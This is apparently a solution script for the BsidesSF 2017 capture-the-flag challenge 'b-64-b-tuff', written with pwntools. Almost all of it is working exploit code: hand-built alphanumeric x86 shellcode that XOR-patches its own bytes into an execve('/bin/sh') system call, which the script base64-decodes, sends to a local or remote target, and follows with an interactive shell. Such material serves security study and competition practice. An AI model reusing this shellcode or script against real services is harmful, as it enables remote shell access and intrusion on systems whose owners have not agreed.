BsidesSF 2017 CTF b-64-b-tuff solution
import string
import sys

from pwn import *
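def exploit():
    """Run the solution once over the module-level connection ``r``.

    Steps, in order:
      1. read the address the target prints after ``"start: "`` (it is
         only echoed for the operator; nothing below uses it),
      2. assemble the shellcode in ``code`` and report every byte that
         falls outside ``valid`` (ASCII letters and digits),
      3. print the disassembly and the raw bytes for inspection,
      4. send the base64-decoded form of the shellcode (three ``=`` are
         appended first, exactly as the original did) and hand the
         session to the operator.

    Raises:
        ValueError: when the assembled shellcode contains a byte outside
            ``valid``.  The original only printed such bytes and then sent
            the payload anyway; aborting keeps a payload that the script
            itself has just flagged as invalid from ever leaving the host.

    Note: relies on the globals ``r`` (set in ``__main__``) and the
    ``asm``/``disasm`` helpers from ``pwn``.
    """
    r.recvuntil("start: ")
    addr = r.recv(10)          # "0x" + 8 hex digits, as printed by the target
    addr = int(addr, 16)
    print(hex(addr))

    # Same alphabet as the original hand-written list: A-Z, a-z, 0-9.
    valid = frozenset(string.ascii_letters + string.digits)

    # Assembler source.  The '#' and '//' lines inside the literal are
    # assembler comments written by the original author; the literal is
    # reproduced unchanged because the exact byte sequence is what matters.
    code = """
        push eax
        pop ecx # Use to store PC
        push 0x58
        pop eax
        xor al, 0x58 # eax = 0
        xor al, 0x7a
        xor [ecx+0x42], al # XOR / in path
        xor [ecx+0x43], al # XOR / in path
        xor [ecx+0x4b], al # XOR / in path
        xor al, 0x7a # eax = 0
        xor al, 0x63
        xor [ecx+0x50], al # XOR pop ebx
        xor al, 0x63 # eax = 0
        xor al, 0x54
        xor [ecx+0x64], al # XOR sub al, 0x36
        xor al, 0x54 # eax = 0
        dec eax # eax = 0xffffff
        xor [ecx+0x66], al # XOR first byte of syscall
        xor [ecx+0x67], al # XOR second byte of syscall
        push 0x58
        pop eax
        xor al, 0x58 # eax = 0
        xor al, 0x4e
        xor [ecx+0x67], al # XOR second byte of syscall
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        //xor eax,eax
        push 0x58
        pop eax
        xor al, 0x58 # eax = 0
        push eax
        push 0x68735555 # needs patch
        push eax
        pop edx
        push eax
        pop edx
        push 0x6e696255 # needs patch
        // mov ebx,esp
        push esp
        //pop ebx # needs patch
        .byte 0x38
        //mov ecx,eax
        push eax
        pop ecx
        // mov edx,eax
        push eax
        pop edx
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        //mov al, 0xb
        push 0x41
        pop eax
        // sub al, 0x36 # 2b 36 Needs patch to 2b
        .byte 0x78, 0x36
        //int 0x80 = cd 80
        .byte 0x32, 0x31 #int 0x80 after XORs
        .byte 0x41 # padding
        .byte 0x41 # padding
    """
    sc = asm(code)

    # Report every offending byte (same message as before), but remember
    # them so we can refuse to send instead of silently continuing.
    bad = [b for b in sc if b not in valid]
    for b in bad:
        print("{} ({:02x}) is not valid".format(b, ord(b)))

    print(disasm(sc))
    print(sc)

    if bad:
        raise ValueError(
            "{} shellcode byte(s) outside the allowed alphabet; not sending".format(len(bad))
        )

    sc += "==="
    r.send(sc.decode('base64'))
    r.interactive()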
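if __name__ == "__main__":
    # Usage: with HOST PORT the target is remote; with no arguments a local
    # copy of ./b-64-b-tuff is started under gdb.  Any other argument count
    # is a usage error -- the original took "more than one argument" as
    # remote and then crashed with IndexError when PORT was missing.
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) == 3:
        r = remote(sys.argv[1], int(sys.argv[2]))
    elif len(sys.argv) == 1:
        # LD_PRELOAD is cleared for the child as in the original invocation.
        r = process(["./b-64-b-tuff"], env={"LD_PRELOAD": ""})
        log.info("PID: {}".format(util.proc.pidof(r)))
        gdb.attach(r)
    else:
        sys.exit("usage: %s [HOST PORT]" % sys.argv[0])
    # ``r`` is a module global that exploit() reads.
    exploit()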